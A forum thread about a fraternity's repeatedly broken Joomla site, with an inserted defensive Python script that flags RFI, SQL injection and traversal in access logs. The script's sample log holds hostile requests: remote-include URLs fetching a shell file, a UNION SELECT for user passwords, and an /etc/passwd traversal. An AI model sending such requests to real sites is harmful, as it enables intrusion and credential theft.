Website being hacked (I think)
airbornflght
Houston, TX Icrontian
Ok, the first time the site got compromised I was willing to think it was something I did. But last night I spent about 4 hours laying a new install of Joomla down and getting it back to around 95%. I installed only one component and everything was working beautifully when I went to bed.
Now the site has gone to hell again. Now I am more than willing to say someone else is maliciously accessing the site. And I can't get SiteGround's POS raw access logs to work. The only other IP I could find in cPanel that was accessing the house: 66.249.65.43. I googled it and it appears that it is part of a botnet.
I'm getting pissed and I want to find out who is doing this and why the hell anyone would want to compromise a local fraternity chapter's website. And is Joomla really this full of holes?
Comments
http://ws.arin.net/whois/?queryinput=66.249.65.43
I was getting PHP errors. One on the admin backend was something like "could not authenticate" or something. I forget the exact PHP error that was thrown, but I couldn't log in to the admin backend. And on the front end all of my menus were gone, as well as content.
I should have copied the thrown errors, but I was in such a hurry to get the site back up I didn't think to.
And before, when I tried to look at the public site, nothing was shown but a PHP error saying that a file was missing from the includes directory that was being called from index. I may not be a PHP/webmaster expert, but I know enough that I haven't touched any files or modified any code that would do such a thing.
And twice in a row? I'm less willing to toss that up to happenstance. And I had nothing to do with this hosting company. They've been with SiteGround for 3 or 4 years now. I wanted to switch, but they are so damn cheap. Their customer service sucks though. It took me an hour to find an email address, and it was to report TOS abuses. I don't care as long as someone reads it. I want access logs. I am steaming right now. I'm just grateful the database hasn't been tampered with.
I found these in cPanel's Analog stats. These are failed requests. The ones in bold further my suspicions that someone is actively trying to find holes and exploit them.
A) Exploiting Joomla, to my knowledge, isn't easy, especially if it's up-to-date
and B) No one cares about your website (sorry, but keep perspective)
and C) Exploits usually involve either defacing the site (which didn't happen) or stealing your data (which there is none to take) not creating PHP errors
and D) No one "tries to find holes" in your Joomla software, they have their own copies for that. They just pwn yours after they find them
therefore E) This is probably a software issue or someone else with access messing up (accidental or malicious I know not)
There's your mistake right there.
That CMS makes PHP-Nuke look secure.
Also make sure your PHP is in safe mode (if your web host supports it).
Almost all bots/script kiddies that will try to attack your site will be stopped in their tracks when they can't do anything useful once they get a shell.
A) Joomla takes their sweet time fixing security exploits. When I had Joomla there was a point where an exploit that could be used to get a shell was on the usual places for over a month before it was patched. As they were taking too long to fix it, I switched to a better CMS (Drupal).
edit: The amount of RFI and SQL injections out there for Joomla is probably higher than for most CMSs.
B) Bots hack indiscriminately. It doesn't matter if it's a charity site or if it's microsoft.com: if you're vulnerable to a particular exploit it's looking for, when it finds your box it will run its script and likely deface your site. (It also might install a PHP shell.)
C) Exactly right, If he posted the error it might be more use in trouble shooting.
D), E) I fully agree with you there.
edit: Keebler, if you're interested in seeing some of these exploits, please PM me and I can link you.
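The thread so far turns on two things: the failed requests the original poster found in the cPanel stats (taken as a sign of someone hunting for holes), and the reply above pointing out that bots scan indiscriminately for RFI and SQL injection in Joomla. The script below is an added example, not something any participant posted and not SiteGround's or Joomla's tooling: it parses Apache/cPanel combined-format access log lines and flags the request patterns a Joomla-era scanner leaves behind. The log lines, the component names (com_example, com_gallery) and the 203.0.113.x / 198.51.100.x addresses are constructed for the example; only the `mosConfig_absolute_path` / `mosConfig_live_site` parameter names and the `jos_` table prefix are real Joomla/Mambo artefacts.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/cPanel "combined" access log format. The regex is this example's own;
# the field order (ip ident user [ts] "req" status size "referer" "ua") is standard.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?\s*$'
)

# A query value that is itself a remote URL is the classic remote-file-inclusion
# (RFI) probe: the scanner hopes the value ends up in a PHP include/require.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.I)

# Crude SQL-injection signatures, matched against the URL-decoded query string.
SQLI_RE = re.compile(
    r"(union\s+select|'\s*(or|and)\s+\S+\s*=|/\*.*\*/|--\s*$|\bsleep\s*\()",
    re.I | re.S,
)

TRAVERSAL_RE = re.compile(r'(\.\./|%2e%2e%2f|\.\.\\)', re.I)

# Scripts under these Joomla directories are almost never requested directly by a
# visitor; a 404 on one of them means the client is walking a list of known
# vulnerable extensions, whether or not this site has them installed.
PROBE_PATH_RE = re.compile(r'^/(administrator|components|modules|includes|plugins)/.+\.php', re.I)


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e['status'] = int(e['status'])
    parts = urlsplit(e['target'])
    e['path'] = unquote(parts.path)
    e['query'] = unquote(parts.query)
    # keep_blank_values: RFI payloads often end in a bare "?" to swallow the
    # rest of the include path, which yields an empty trailing key.
    e['params'] = parse_qsl(parts.query, keep_blank_values=True)
    return e


def classify(e):
    """Return the sorted list of suspicious-pattern tags for one parsed request."""
    tags = set()
    for _, value in e['params']:
        if REMOTE_URL_RE.match(value.strip()):
            tags.add('rfi')
    if SQLI_RE.search(e['query']):
        tags.add('sqli')
    if TRAVERSAL_RE.search(e['target']):
        tags.add('traversal')
    if e['status'] == 404 and PROBE_PATH_RE.match(e['path']):
        tags.add('probe-404')
    return sorted(tags)


def analyze(log_text):
    """Summarise per client IP; only IPs with at least one flagged request are returned."""
    per_ip = defaultdict(lambda: {'requests': 0, 'suspicious': 0, 'tags': set(), 'targets': []})
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        s = per_ip[e['ip']]
        s['requests'] += 1
        tags = classify(e)
        if tags:
            s['suspicious'] += 1
            s['tags'].update(tags)
            s['targets'].append(e['target'])
    return {ip: s for ip, s in per_ip.items() if s['suspicious']}


# Constructed sample log: one ordinary visitor and one scanner (documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2009:03:14:01 -0600] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2009:03:15:10 -0600] "GET /index.php?option=com_content&mosConfig_absolute_path=http://203.0.113.99/shell.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
198.51.100.23 - - [12/Mar/2009:03:15:11 -0600] "GET /administrator/components/com_example/admin.example.php?mosConfig_live_site=http://203.0.113.99/c.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
198.51.100.23 - - [12/Mar/2009:03:15:12 -0600] "GET /components/com_gallery/upload.php HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
198.51.100.23 - - [12/Mar/2009:03:15:13 -0600] "GET /index.php?option=com_content&id=1%27%20UNION%20SELECT%20username,password%20FROM%20jos_users-- HTTP/1.1" 500 0 "-" "libwww-perl/5.805"
198.51.100.23 - - [12/Mar/2009:03:15:14 -0600] "GET /index.php?option=com_example&file=../../../../etc/passwd HTTP/1.1" 200 1800 "-" "libwww-perl/5.805"
203.0.113.7 - - [12/Mar/2009:03:16:00 -0600] "GET /images/logo.png HTTP/1.1" 200 9034 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for ip, s in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {s['suspicious']}/{s['requests']} requests flagged, tags={sorted(s['tags'])}")
        for t in s['targets']:
            print('   ', t)
```

Run it against a real raw access log with `analyze(open('access_log').read())`. The `probe-404` rule is the one that answers the original poster's question most directly: a burst of 404s on `/components/...` and `/administrator/components/...` paths from one IP is a scanner trying every extension on its list, and it does not care whose site it is. The `rfi` hits are the ones worth chasing, because a scanner only follows up on the requests that did not 404.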
For instance: http://www.okstatedelts.com/administ...hidemainmenu=1
I know for a fact that it wasn't me. (I was sleeping) and none of the other guys in the house know enough about a computer to even find the backend nor do they have a reason. We don't have any disgruntled ex-members as far as I know. But I changed all the account info that has been the same for as long as they've had the account.
You may say that no one cares enough to do anything to our little site. And I agreed with you the first time it happened. I thought, who the hell cares enough about us to deface our site? Obviously someone does. Because things like this don't happen three times within a month on their own. I don't know if it's internal or external, but if SiteGround is worth a damn they will get me the access logs, as the ones from cPanel were inaccessible (just an executable that did nothing once clicked).
And that one IP address I posted earlier I googled, and it seemed to bring up a lot of results about botnets. But even then, why would someone attack websites indiscriminately just for the hell of it?
Normally they just deface them for political reasons or some other BS :/
Have you considered switching to drupal ?
Is there a migration script? I just (within the last 2 months) got everything onto Joomla 1.5.
Things I need out of a CMS are the ability to provide a photo gallery, a document management/gallery/display type thing, integration with Google Calendar, and a form function that keeps track of stuff like FacileForms does.
Other than that I'm open to switching. It's basically the 3rd-party support for Joomla that drew me to it, as well as its semi-simple backend and UI.
There are probably downloadable modules for everything you need, but I don't think there is a migration script.
As for drupal itself I wish I had found it first before setting up some mambo sites. Now I'm at the road, where I've got a lot done to make the mambo sites look right and I don't know if I want to flip them to Drupal. But any new sites I've been working on are going to be drupal.